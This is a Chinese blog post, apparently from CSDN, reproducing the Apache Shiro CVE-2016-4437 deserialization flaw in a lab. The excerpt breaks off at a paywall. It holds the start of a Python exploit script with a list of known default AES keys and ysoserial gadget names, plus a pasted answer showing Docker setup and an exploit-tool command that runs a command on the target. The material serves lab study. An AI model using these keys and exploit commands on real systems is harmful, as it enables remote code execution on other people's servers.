shiro-cve_2016_4437漏洞复现

最新推荐文章于 2025-05-10 17:02:36 发布
最新推荐文章于 2025-05-10 17:02:36 发布
阅读量949 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 渗透测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_42019588/article/details/113395928
本文详细介绍了Apache Shiro的CVE-2016-4437漏洞,这是一个Java反序列化漏洞。内容包括漏洞概述、复现步骤以及总结。通过在Vulfocus平台搭建环境,模拟用户登录并利用Remember Me功能,配合特定的攻击payload,成功触发反序列化漏洞,获取了反弹shell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

shiro-cve_2016_4437漏洞复现

漏洞概述:

该漏洞发布于2016年6月,属于java反序列化漏洞的一种,Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。

Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookie中rememberMe字段内容分别进行序列化、AES加密、Base64编码操作。只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都会导致反序列化漏洞。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。

漏洞复现:

在vulfocus平台上拉取下载shiro-cve_2016_4437漏洞镜像,并运行漏洞环境

在浏览器访问使用root用户登录,并勾选Remember ME,点击登录

登录成功

在GitHub上下载攻击exp

 

#! python2.7

import os

import re

import base64

import uuid

import subprocess

import requests

import sys

import json

import time

import random

import argparse

from Crypto.Cipher import AES

JAR_FILE = 'ysoserial.jar'

CipherKeys = [

    "4AvVhmFLUs0KTA3Kprsdag==",

    "3AvVhmFLUs0KTA3Kprsdag==",

    "2AvVhdsgUs0FSA3SDFAdag==",

    "6ZmI6I2j5Y+R5aSn5ZOlAA==",

    "wGiHplamyXlVB11UXWol8g==",

    "cmVtZW1iZXJNZQAAAAAAAA==",

    "Z3VucwAAAAAAAAAAAAAAAA==",

    "ZnJlc2h6Y24xMjM0NTY3OA==",

    "L7RioUULEFhRyxM7a2R/Yg==",

    "RVZBTk5JR0hUTFlfV0FPVQ==",

    "fCq+/xW488hMTCD+cmJ3aQ==",

    "WkhBTkdYSUFPSEVJX0NBVA==",

    "1QWLxg+NYmxraMoxAXu/Iw==",

    "WcfHGU25gNnTxTlmJMeSpw==",

    "a2VlcE9uR29pbmdBbmRGaQ==",

    "bWluZS1hc3NldC1rZXk6QQ==",

    "5aaC5qKm5oqA5pyvAAAAAA==",

    "kPH+bIxk5D2deZiIxcaaaA==",

    #"ZWvohmPdUsAWT3=KpPqda",

    "r0e3c16IdVkouZgk1TKVMg==",

    "ZUdsaGJuSmxibVI2ZHc9PQ==",

    "U3ByaW5nQmxhZGUAAAAAAA==",

    "LEGEND-CAMPUS-CIPHERKEY=="

    #"kPv59vyqzj00x11LXJZTjJ2UHW48jzHN",

    ]

gadgets = ["JRMPClient","BeanShell1","Clojure","CommonsBeanutils1","CommonsCollections1","CommonsCollections2","CommonsCollections3","CommonsCollections4","CommonsCollections5","CommonsCollections6","CommonsCollections7","Groovy1","Hibernate1","Hibernate2","JSON1","JavassistWeld1","Jython1","MozillaRhino1","MozillaRhino2","Myfaces1","ROME","Spring1","Spring2","Vaadin1","Wicket1"]

session = requests.Session()

def genpayload(params, CipherKey,fp):

    g
最低0.47元/天 解锁文章

200万优质内容无限畅学
CVE-2016-4437 Shiro反序列化漏洞复现
weixin_45260839的博客
05-15 3039
CVE-2016-4437 Shiro反序列化漏洞复现
【渗透测试】-CVE-2016-4437-Shiro550漏洞复现
weixin_65311462的博客
09-13 1282
Shiro550漏洞CVE-2016-4437)是Apache Shiro框架中的一个高危反序列化漏洞,主要影响版本为1.2.4及以前版本。该漏洞允许攻击者通过RememberMe功能实现远程代码执行(RCE)。及时更新Apache Shiro框架到最新版本,确保已修复该漏洞。对来自用户的输入进行严格的验证和过滤处理,以防止恶意代码的注入。使用安全的加密算法和密钥管理策略来保护敏感数据。
shiro反序列化漏洞复现CVE-2016-4437
wangzhifei1的博客
01-19 2427
Apache Shiro是一个强大且易于使用的Java安全框架,提供认证、授权、加密以及会话管理功能。CVE-2016-4437具体涉及了Apache Shiro在使用记住我(RememberMe)功能时的反序列化漏洞
Apache Shiro 1.2.4 反序列化漏洞CVE-2016-4437)
spinage的博客
05-10 555
攻击者可利用该漏洞通过伪造的 RememberMe Cookie 触发恶意代码执行
[CVE-2016-4437] Apache Shiro 安全框架反序列化漏洞复现与原理详细分析
Specif1c的博客
10-21 5550
Apache Shiro是一个强大且易用的 Java安全框架,执行身份验证、授权、密码和会话管理。shiro 相比于 springsecurity 简单许多,官方号称 10 分钟就能学会。shiro 反序列化漏洞是 Java 经典漏洞,于2016年被挖掘出来,到现在依旧很多系统存在该漏洞,非常值得学习,对加深 shiro 认证机制的理解以及java代码审计颇有帮助。
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )
渗透之路,攻防之间皆学问
03-28 1万+
Shiro 1.2.4 反序列化漏洞
shiro反序列化漏洞详解与复现shiro-550/CVE-2016-4437
ccccai22的博客
08-28 382
shiro反序列化漏洞shiro-550/CVE-2016-4437
shiro反序列化漏洞复现CVE-2016-4437
m0_70349048的博客
05-19 780
cookie的key为RememberMe,cookie的值是经过相关信息进行序列化,然后使用AES加密(对称),最后再使用Base64编码处理。,这意味着攻击者只要通过源代码找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化,AES加密,Base64编码,然后将其作为cookie的Remember Me字段发送,Shiro将RememberMe进行解密并且反序列化,最终造成反序列化漏洞。将生成的payload复制到请求包cookie的位置, 发包。可以看到,已经能够远程执行任意命令了。
详细shiro漏洞复现及利用方法(CVE-2016-4437
热门推荐
dreamthe的博客
04-26 3万+
该篇文章比较详细的介绍shiro漏洞利用,无论是shiro漏洞图形化工具利用,还是shiro漏洞结合JRMP我觉得比大多数文章都详细,如果你对网上结合JRMP反弹shell不是很明白,非常推荐来看看这篇文章。另外漏洞利用工程中用到的工具以及代码都上传到百度网盘,供大家使用,在文章最后哦。
Shiro 漏洞复现CVE-2016-4437
qq_42699326的博客
11-23 1086
CVE-2016-4437 是一个认证绕过漏洞Shiro 在使用 Cookie 存储会话信息时,未对。
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle 漏洞利用
03-29
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle Shiro721 RememberMe Padding Oracle影响版本: - Apache Shiro 1.2.5,1.2.6,1.3.0,1.3.1,1.3.2,1.4.0-RC2,1.4.0,1.4.1 CVE-2016-4437 Shiro550影响版本: - Apache Shiro<=1.2.4 exp: ``` GUI
Shiro-CVE-2016-4437 漏洞复现(vulhub靶场搭建)
zzxyccxc的博客
09-12 1420
Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会将用户信息加密,加密过程:用户信息=>序列化=>AES加密=>base64编码=>RememberMe Cookie值。
CVE-2016-4437 Apache Shiro 反序列化漏洞复现
yzl_007的博客
07-26 544
Apache Shiro 反序列化漏洞复现CVE-2016-4437漏洞描述 Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都会导致反序列化漏洞。 使用burp抓包查看 漏洞原理 Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。 Shiro对rememberMe的cookie做了加密处理,shiro
shiro CVE-2016-4437 漏洞复现
qq_40646572的博客
05-09 1069
shiro550漏洞漏洞点就在于用户信息反序列化可利用,并且加密的key值给了一个固定的默认值的,导致很多开发人员直接使用,接着导致了洞的产生。
CVE-2016-4437---Shiro反序列化漏洞
qq_44880255的博客
08-10 4213
1、影响版本 Apache Shiro <= 1.2.4 2、漏洞原因 Apache Shiro默认使用了CookieRememberMeManager。其处理cookie的流程是: 得到rememberMe的cookie值;Base64解码;AES解密;反序列化。 然而AES的密钥是硬编码的,即AES加解密的密钥是写死在代码中的,攻击者可以构造恶意数据造成反序列化漏洞。 3、漏洞复现 这里使用的环境是Kali中的vulhub和docker。 首先进入目录vulhub/shiro/CVE-2016
shiro反序列化漏洞(CVE-2016-4437)漏洞复现
HEAVEN569的博客
06-21 7180
本文对shiro反序列化漏洞(CVE-2016-4437),进行了分析复现,介绍了利用工具和常规修复方法
漏洞复现Shiro rememberMe反序列化漏洞CVE-2016-4437
weixin_45556536的博客
11-11 1882
shrio反序列化漏洞 一、漏洞介绍 Shiro 是 Java 的一个安全框架。Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。 二、影响范围 Apache Shiro <= 1.2.4 三、漏洞复现 恶意 Cookie rememberMe值构造前1
shiro漏洞复现CVE-2016-4437反序列化漏洞+CVE-2020-1957权限绕过漏洞
serendipity1130的博客
09-01 591
1.CVE-2016-4437 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 1.证明存在shiro漏洞:(win7虚拟机) 打开下载好的ShiroExploit.jar,进入图形化Shiro检测界面,输入靶机ip,点击下一步。 2.选择第一个使用ceye.io进行漏洞检测,点击下一步,开始执行检测。
Docker环境复现Shiro反序列化漏洞CVE-2016-4437
最新发布
08-03
<think>我们参考了提供的引用内容,特别是引用[2]和引用[4]中关于使用Docker搭建漏洞环境的步骤。 根据引用[2]和[4],我们可以总结出以下步骤: 1. 拉取漏洞环境的Docker镜像:docker pull medicean/vulapps:s_shiro_1 2. 启动Docker容器:将容器的8080端口映射到主机的某个端口(例如8081),使用命令:docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1 3. 访问搭建好的环境:http://<your_host_ip>:8081 注意:如果主机有防火墙,需要放行对应端口(如8081)。 另外,引用[5]提到可以使用shiro_exploit.py进行漏洞利用,但用户目前只需要搭建环境,所以先提供环境搭建步骤。 因此,回答将按照以下步骤进行: 1. 确保已安装Docker并启动Docker服务。 2. 拉取镜像。 3. 运行容器。 4. 验证环境。 同时,考虑到用户可能需要进行漏洞复现,我们可以在相关问题中提供漏洞复现的参考。 注意:由于引用中提到的镜像名称一致,我们使用同一个镜像。</think>### Docker搭建Apache Shiro反序列化漏洞环境CVE-2016-4437) #### 环境搭建步骤: 1. **拉取漏洞镜像** 使用官方漏洞测试镜像(需提前安装Docker): ```bash docker pull medicean/vulapps:s_shiro_1 ``` 2. **启动容器** 将容器8080端口映射到主机端口(示例用8081): ```bash docker run -d -p 8081:8080 --name shiro_cve medicean/vulapps:s_shiro_1 ``` - `-d`:后台运行 - `-p 8081:8080`:主机端口:容器端口 - `--name`:指定容器名称 3. **防火墙配置** 若主机有防火墙(如CentOS): ```bash firewall-cmd --add-port=8081/tcp --permanent firewall-cmd --reload ``` 4. **验证环境** 访问 `http://<你的服务器IP>:8081`,出现Apache Shiro测试页面即搭建成功[^2][^4]。 --- #### 漏洞验证(可选) 使用工具验证漏洞(需额外安装Python3): ```bash # 下载利用工具 git clone https://github.com/feihong-cs/ShiroExploit.git # 执行命令检测(示例创建测试文件) python3 ShiroExploit.py -u http://<IP>:8081 -p "touch /tmp/success" ``` 若返回`[+] 漏洞存在`且在容器中查看到`/tmp/success`文件,则验证成功[^5]。 --- #### 关键说明 1. 漏洞原理:Shiro 1.2.4使用硬编码AES密钥,攻击者可通过伪造rememberMe Cookie触发Java反序列化执行任意命令[^3]。 2. 环境镜像包含: - Apache Shiro 1.2.4 - 存在漏洞的Web应用 - 集成Tomcat服务 3. 停止环境:`docker stop shiro_cve` ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值